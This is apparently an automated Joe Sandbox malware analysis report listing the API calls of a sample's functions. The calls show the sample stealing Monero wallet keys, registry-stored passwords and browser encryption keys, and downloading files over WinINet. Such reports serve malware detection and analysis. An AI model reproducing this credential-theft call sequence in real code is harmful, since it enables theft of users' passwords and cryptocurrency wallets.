                                  • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
                                • lstrlen.KERNEL32(00000000), ref: 0055532F
                                  • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
                                • lstrlen.KERNEL32(00000000), ref: 00555383
                                • lstrlen.KERNEL32(00000000), ref: 005553AE
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 9b5c9a6e9747e9a7148ad125a57441314114b8931e9cf47de7ab474dfa4be308
                                • Instruction ID: 5ae7621e75d3d4629fddc38ff8630a3b0a066777a3416c049d3b7f1651f48980
                                • Opcode Fuzzy Hash: 9b5c9a6e9747e9a7148ad125a57441314114b8931e9cf47de7ab474dfa4be308
                                • Instruction Fuzzy Hash: 4B510C3091014AABDB14EF60C9BAAED7F79BF90302F504119FC065A592EF347B49CB66
                                Function 005512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: cade88411d2d016d6c07692773a68a5563d2593aa32cff9d8d7ca4dd20f2f8c0
                                • Instruction ID: e296e8ceb53735ead426b3651baa71c13be0a175310ef78dd6bc99edd018df4c
                                • Opcode Fuzzy Hash: cade88411d2d016d6c07692773a68a5563d2593aa32cff9d8d7ca4dd20f2f8c0
                                • Instruction Fuzzy Hash: 3EC1E9B5900109ABCB14EF60DC9DFEA7B78BF94301F10459AF90A67141EF74AA89CF91
                                Function 00554280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 005542EC
                                • lstrcat.KERNEL32(?,0107ECE8), ref: 0055430B
                                • lstrcat.KERNEL32(?,?), ref: 0055431F
                                • lstrcat.KERNEL32(?,0107DC60), ref: 00554333
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 00558D90: GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F
                                  • Part of subcall function 00549CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00549D39
                                  • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                                  • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                                  • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                                  • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                                  • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                                  • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                                  • Part of subcall function 005593C0: GlobalAlloc.KERNEL32(00000000,005543DD,005543DD), ref: 005593D3
                                • StrStrA.SHLWAPI(?,0107EC88), ref: 005543F3
                                • GlobalFree.KERNEL32(?), ref: 00554512
                                  • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                                  • Part of subcall function 00549AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                                  • Part of subcall function 00549AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                                  • Part of subcall function 00549AC0: LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 005544A3
                                • StrCmpCA.SHLWAPI(?,005608D1), ref: 005544C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 005544D2
                                • lstrcat.KERNEL32(00000000,?), ref: 005544E5
                                • lstrcat.KERNEL32(00000000,00560FB8), ref: 005544F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 5f52e5177555b204af9ab5cc81bfaef6c7b6e30c1c6f7eb5098ced841dea2a83
                                • Instruction ID: 400e2d445c6744c9d2e30266d89ce4b231922a0e797b5cbc3397ab0c0c277e50
                                • Opcode Fuzzy Hash: 5f52e5177555b204af9ab5cc81bfaef6c7b6e30c1c6f7eb5098ced841dea2a83
                                • Instruction Fuzzy Hash: 1C717A76900209BBDB14EBB0DC99FEE7779BB88305F008599F60597181EA34DB49CFA1
                                Function 00541310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                                  • Part of subcall function 005412A0: RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                                  • Part of subcall function 005412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                                  • Part of subcall function 005412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                                  • Part of subcall function 005412A0: RegCloseKey.ADVAPI32(?), ref: 005412FF
                                • lstrcat.KERNEL32(?,00000000), ref: 0054134F
                                • lstrlen.KERNEL32(?), ref: 0054135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00541377
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0107B548,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00541465
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                                  • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                                  • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                                  • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                                  • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                                  • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 005414EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: ee875e77cc61077be5d2acd203389c4ccfce5e50320b7a0a5a8460ba9161ea63
                                • Instruction ID: f7ddf242a6d66f4856078bedeaebf6c707ad5efbce0235e5268603c7a9858ccf
                                • Opcode Fuzzy Hash: ee875e77cc61077be5d2acd203389c4ccfce5e50320b7a0a5a8460ba9161ea63
                                • Instruction Fuzzy Hash: 885165B1D5011A57CB15FB60DCA6FED7B3CBF94301F404299B60A62081EE346B89CFA6
                                Function 005475D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                                  • Part of subcall function 005472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                                  • Part of subcall function 005472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                                  • Part of subcall function 005472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                                  • Part of subcall function 005472D0: HeapFree.KERNEL32(00000000), ref: 00547459
                                • lstrcat.KERNEL32(00000000,005617FC), ref: 00547606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00547648
                                • lstrcat.KERNEL32(00000000, : ), ref: 0054765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 0054768F
                                • lstrcat.KERNEL32(00000000,00561804), ref: 005476A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 005476D3
                                • lstrcat.KERNEL32(00000000,00561808), ref: 005476ED
                                • task.LIBCPMTD ref: 005476FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                                • Instruction ID: 044deabaefb69752478f4a9cd8b8b0ef747b106a024b79909f6d9db1906845c1
                                • Opcode Fuzzy Hash: f2e350da37d5372cba41a6db2d45e5299681c0b1f3be9a724509019ff2f19b23
                                • Instruction Fuzzy Hash: 12318371A4010AEFDB04EBB4DC59DFF7B75FB88305B24810AF102A7251EB38A946CB65
                                Function 00558100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0107F2A0,00000000,?,00560E2C,00000000,?,00000000), ref: 00558130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00558137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00558158
                                • __aulldiv.LIBCMT ref: 00558172
                                • __aulldiv.LIBCMT ref: 00558180
                                • wsprintfA.USER32 ref: 005581AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                                • Instruction ID: 3baf981012064c3505892516461b4277773cbd6ad6e3eb0abb3d9f34f52027b9
                                • Opcode Fuzzy Hash: 66776c86fd9d64b2b99acdc9d6571ba718b252245f3221c2208afdc0377d4914
                                • Instruction Fuzzy Hash: DC214FB1E44209ABEB10DFD4CC49FAFBB78FB44711F20450AF605BB280D77869058BA5
                                Function 005460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                                  • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                                • InternetOpenA.WININET(00560DF7,00000001,00000000,00000000,00000000), ref: 0054610F
                                • StrCmpCA.SHLWAPI(?,0107F608), ref: 00546147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0054618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005461B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 005461DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0054620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00546249
                                • InternetCloseHandle.WININET(?), ref: 00546253
                                • InternetCloseHandle.WININET(00000000), ref: 00546260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                                • Instruction ID: af584ca26c0e9cd2120ff875c94e8d6bb48393cec1f3a023caf0e4bef631a4e1
                                • Opcode Fuzzy Hash: 59507e7f1c8fac8384882174f9546b8e9fb74a86fdcf1cc9a9fdece59affcd34
                                • Instruction Fuzzy Hash: 035194B1940208BBEF20DF60DC49BEE7B78FB44705F108599B605A71C1DBB46A89CF96
                                Function 005472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0054733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005473B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0054740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00547452
                                • HeapFree.KERNEL32(00000000), ref: 00547459
                                • task.LIBCPMTD ref: 00547555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                                • Instruction ID: dfd562b83884cecb16fbd4e1631704645cd817438414521d642774f6791628f7
                                • Opcode Fuzzy Hash: 24ba2bea9ba16a8ee07ac987d098acf05121936016b5e0a8fa29ae64a50be244
                                • Instruction Fuzzy Hash: 9E613CB590426D9BDB24DB50CC45FEABBB8BF48304F0085E9E649A6141DBB05FC9CFA1
                                Function 0054BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                • lstrlen.KERNEL32(00000000), ref: 0054BC9F
                                  • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
